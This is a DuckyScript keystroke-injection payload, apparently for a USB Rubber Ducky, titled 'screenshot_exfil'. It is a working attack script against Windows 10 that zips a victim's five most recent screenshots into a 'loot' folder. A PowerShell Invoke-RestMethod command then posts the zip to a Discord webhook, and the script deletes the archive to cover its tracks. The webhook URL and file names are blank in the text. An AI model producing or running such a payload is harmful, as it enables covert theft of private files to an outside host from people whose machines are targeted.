REM Title: screenshot_exfil REM Author: the-jcksn REM Description: Creates zip folder of 5 most recent screenshots and sends them via Discord. REM Target: Windows 10 REM Version: 1.1 REM Category: Exfiltration REM ~~~~ You must change the DISCORD_WEBHOOK_URL to your webhook URL. REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low. REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61. REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me. REM ~~~~ Use responsibly, and within the confines of the law. DELAY 2000 GUI r DELAY 200 REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots STRING %USERPROFILE%\Pictures\Screenshots ENTER DELAY 150 REM sorting the files by date MENU DELAY 150 STRING o DELAY 150 DOWNARROW DELAY 150 ENTER DELAY 150 REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays SHIFT RIGHTARROW SHIFT RIGHTARROW SHIFT RIGHTARROW SHIFT RIGHTARROW DELAY 150 REM sending files to MENU DELAY 150 STRING n DELAY 200 DOWNARROW DELAY 150 ENTER DELAY 500 STRING loot ENTER DELAY 150 ALT F4 DELAY 150 GUI r DELAY 150 REM open powershell and send the webhook message STRING powershell ENTER DELAY 500 REM ~~~~~~~CHANGE THE WEBHOOK URL IN THE FOLLOWING~~~~~ STRING Invoke-RestMethod -Uri -Method Post -Headers @{ 'Content-Type' = 'multipart/form-data' } -InFile Pictures\Screenshots\ ENTER DELAY 500 REM cleanup STRING del Pictures\Screenshots\ ENTER DELAY 150 STRING exit ENTER